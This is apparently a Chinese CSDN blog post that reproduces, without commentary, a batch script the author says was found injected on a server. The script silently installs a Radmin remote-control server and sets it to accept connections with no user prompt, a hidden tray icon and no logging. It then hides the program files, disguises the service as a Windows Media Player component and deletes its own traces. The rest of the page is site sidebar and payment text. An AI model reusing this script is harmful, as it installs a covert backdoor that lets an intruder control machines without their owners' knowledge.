[批处理][网络管理中发现服务器上远程控制程序以批处理注入的程序片]

最新推荐文章于 2024-08-28 19:39:24 发布
最新推荐文章于 2024-08-28 19:39:24 发布
阅读量776 收藏
点赞数
分类专栏: 程序代码片 文章标签: 服务器 网络 hex windows c server
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lever0/article/details/547854
版权

@echo off
@system.exe /uninstall /silence
@system.exe /install /silence
echo Windows Registry Editor Version 5.00 > c:/server.reg

echo [HKEY_LOCAL_MACHINE/SYSTEM/RAdmin]>> c:/server.reg

echo [HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/v2.0]>> c:/server.reg

echo [HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/v2.0/Server]>> c:/server.reg

echo [HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/v2.0/Server/iplist]>> c:/server.reg

echo [HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/v2.0/Server/Parameters]>> c:/server.reg
echo "NTAuthEnabled"=hex:00,00,00,00>> c:/server.reg
echo "Parameter"=hex:df,ac,59,ee,60,c7,c2,c8,5b,3d,74,dd,9d,f5,57,2b>> c:/server.reg
echo "Port"=hex:15,1e,00,00>> c:/server.reg
echo "Timeout"=hex:0a,00,00,00>> c:/server.reg
echo "EnableLogFile"=hex:00,00,00,00>> c:/server.reg
echo "LogFilePath"="c://logfile.txt">> c:/server.reg
echo "FilterIp"=hex:00,00,00,00>> c:/server.reg
echo "DisableTrayIcon"=hex:01,00,00,00>> c:/server.reg
echo "AutoAllow"=hex:00,00,00,00>> c:/server.reg
echo "AskUser"=hex:00,00,00,00>> c:/server.reg
echo "EnableEventLog"=hex:00,00,00,00 >> c:/server.reg
@regedit /s c:/server.reg
@net start r_server
@attrib +r +h %systemroot%/system32/drivers/system.exe
@attrib +r +h %systemroot%/system32/drivers/admdll.dll
@attrib +r +h %systemroot%/system32/drivers/raddrv.dll
echo Windows Registry Editor Version 5.00 > c:/ip.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/r_server] >> c:/ip.reg
echo "Description"="为Windows Media Player提供加载进程及为其他的移动媒体,驱动程序和库提供基层安全协议服务。">> c:/ip.reg

@regedit /s c:/ip.reg
@del c:/ip.reg /f /q
@del c:/server.reg /f /q

@sc config r_server displayname= "Windows Management Instrumentation Player Drivers"
@del %systemroot%/system32/haha.exe /f /q
@del %systemroot%/system32/drivers/sc.exe /f /q
@del %systemroot%/system32/drivers/1.bat /f /q
@del %systemroot%/system32/drivers/2.bat /f /q

lever0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
【愚公系列】2024年03月 《网络安全应急管理与技术实践》 026-网络安全应急技术与实践(数据库层-MySQL数据库安全配置)
热门推荐
时光隧道
02-16 5万+
使用强密码:确保MySQL的root用户和其他用户的密码是强密码,包括大写字母、小写字母、数字和特殊字符。限制远程访问:在MySQL配置文件,将bind-address设置为本地IP地址,或者只允许特定IP的访问,以限制远程访问MySQL数据库。使用安全套接字:启用MySQL服务器与客户端之间的安全连接,可以使用SSL证书来加密数据传输。限制用户权限:仅给予用户所需的最低权限,避免给予过高的权限,以防止恶意操作和数据泄露。定期备份数据:定期备份MySQL数据库,以防止数据丢失或损坏。
网络通断记录批处理bat
07-18
网络通断记录批处理bat @echo off :loop ping -n 1 220.189.127.106 |findstr /i / if %errorlevel%==1 (echo.>>
统计网络连接信息的批处理
humors221的专栏
02-26 270
运行环境:win10 使用方法: 1.保存为后缀bat 2.管理员运行 3.每隔五分钟统计一次:组织,次数,地址,端口 @echo off setlocal enabledelayedexpansion cd /d %~dp0 goto loop :loop set num=0 echo netstat开始! netstat -aon>net.txt for /f "tokens=*" %%...
批处理样本
06-14
批量修改启动/停用服务,修改服务类型 @echo off sc config Spooler start= disabled sc stop Spooler pause
强大好用批处理集合
02-27
精品批处理源代码案 经典收藏版 dos病毒专杀工具包 使启动项失效 其它类 大型&综合性脚本 字符串提取&替换等操作 数值计算 文件创建&改名等操作 格式转换 等
Win10批处理宽带管理
Jitwxs
06-11 1032
新建宽带连接.bat文件,将其保存在启动菜单,即可开机自动运行。C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp::以管理员权限运行 %1 %2 ver|find "5.">nul&&goto :st mshta vbscript:createobject("shell.application").shellexecute
网络安全管理员高级工理论题库(持续更新
zs18384022951的博客
11-06 2万+
网络安全管理员高级工理论题库,持续更新……
java远程调用批处理文件代码归总
05-09
Java远程调用批处理文件是将Java编程与批处理脚本结合的一种技术,它允许Java程序执行在远程服务器上的批处理任务,而无需人工干预。这通常涉及到网络通信和进程间交互,使得分布式系统能够更加灵活地管理和调度任务...
基于ASP的DBAdmin 在线Access数据库管理程序 v2.3.zip
07-10
"v2.3.zip"表明这是一个压缩文件,里面可能有源代码、配置文件、帮助文档等相关资源,用户下载后可以解压并部署到服务器上,以实现在线管理Access数据库的功能。 【标签解析】 "asp"标签明确了这个程序的核心技术是...
微服务CI/CD实践(二)服务器先决软件安装
lbmydream的博客
08-28 989
微服务CI/CD实践系列: 微服务CI/CD实践(一)环境准备及虚拟机创建 微服务CI/CD实践(二)服务器先决准备 微服务CI/CD实践(三)gitlab部署 微服务CI/CD实践(四)nexus3部署 微服务CI/CD实践(五)数据库,redis,nacos等基础间件部署 微服务CI/CD实践(六)Jenkins部署 微服务CI/CD实践(七)Server服务器环境初始化 微服务CI/CD实践(八)Jenkins + Dokcer 部署微服务后端项目 微服务CI/CD实践(九)Jenkins +
Nginx: 负载均衡场景下上游服务器异常时的容错机制
最新发布
Wang的专栏
08-28 1418
Post请求,它就是一个非幂等的 http 请求方法,因为可能会在后端服务器上创建一些资源。所谓幂等的请求, 是指这个请求发出去之后,无论请求多少次,得到的结果通常是一致的。默认值: proxy_next_upstream error timeout;非幂等请求,可能对服务器造成不可预见的一些错误,在某些场景下是很危险的。2 )proxy_next_upstream_timeout 指令。3 )proxy_next_upstream_tries 指令。1 )proxy_next_upstream 指令。
江苏BGP大带宽服务器所适用的业务有哪些?
wanhengwangluo的博客
08-27 461
在大型的网络游戏行业当需要处理大量的实时交互数据,支持大量的玩家用户同时上线并不会出现网络堵塞的情况,所以江苏BGP大带宽服务器的出现为网络游戏行业提供了低延迟网络环境与高并发处理能力,确保了游戏体验的流畅性,提高了玩家的游戏体验感。随着网络业务的快速发展,企业对于服务器的性能与网络质量有着很高的要求,而江苏BGP大带宽服务器则有着优质的网络资源和高性能的服务器硬件配置,是大部分企业的理想选择,本文就来介绍一下江苏BGP大带宽服务器都适用于哪些业务。
高防服务器的流量清洗是什么意思?
wanhengwangluo的博客
08-27 408
高防服务器能够为企业防御一定的网络攻击,是网络游戏行业经常会选择的一款服务器类型,其高防服务器的流量清洗则是指对服务器所接收的流量进行实时监测、识别和过滤,将恶意流量与攻击流量进行清除,保证网络能够正常运行。高防服务器还有着强大的并发处理能力,可以同时处理大量的流量请求,以此来保障网络服务的稳定性。当发现异常的流量或者是攻击行为,高防服务器能够做出实时响应,采取相应的防御措施,根据实际情况与攻击的趋势,及时调整流量过滤策略,提高防护效果,保障网络的安全。接下来我们就来探讨一下高防服务器的流量清洗吧!
企业级WEB应用服务器TOMCAT
XLYhanfei的博客
08-27 904
Tomcat服务器是一个免费的开放源代码的Web应用服务器,属于轻量级应用服务器,在小型系统和并发访问用户不是很多的场合下被普遍使用,Tomcat具有处理HTML页面的功能,它还是一个Servlet和 JSP容器。
JavaEE-TCP协议
2301_78493961的博客
08-28 984
介绍了TCP的十个常用核心机制,也是程序员必备理解的关于TCP协议的基本知识。
Nginx负载均衡与后端服务器自动扩展:实现高可用性架构
2402_85758349的博客
08-28 1227
通过本文的详细介绍,你应该能够理解如何在 Nginx 负载均衡处理后端服务器的自动扩展。结合云服务提供商的自动扩展服务或容器编排工具,可以构建一个弹性、高效和可扩展的 Web 应用架构。Nginx 作为流行的负载均衡器,可以与多种自动扩展技术配合使用,实现高效的服务伸缩。Nginx 本身不提供自动扩展功能,但可以与云服务提供商的自动扩展服务或容器编排工具(如 Kubernetes)集成。自动扩展,也称为弹性伸缩,是指根据实时负载动态调整资源(如服务器实例)的数量,以保持应用性能和响应时间。
Linux 系统调优 2
lixiemang8887的博客
08-28 456
**TCP/IP 参数调优**: 调整 `/etc/sysctl.conf` 网络相关参数,如 `net.core.somaxconn`、`net.ipv4.tcp_tw_reuse`、`net.ipv4.tcp_rmem` 等,提高网络堆栈的效率。- **内核参数调整**: 在 `/etc/sysctl.conf` 配置适合的内核参数,如 `vm.dirty_ratio`、`fs.file-max`、`net.core.rmem_max` 等,优化系统的响应速度和资源管理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值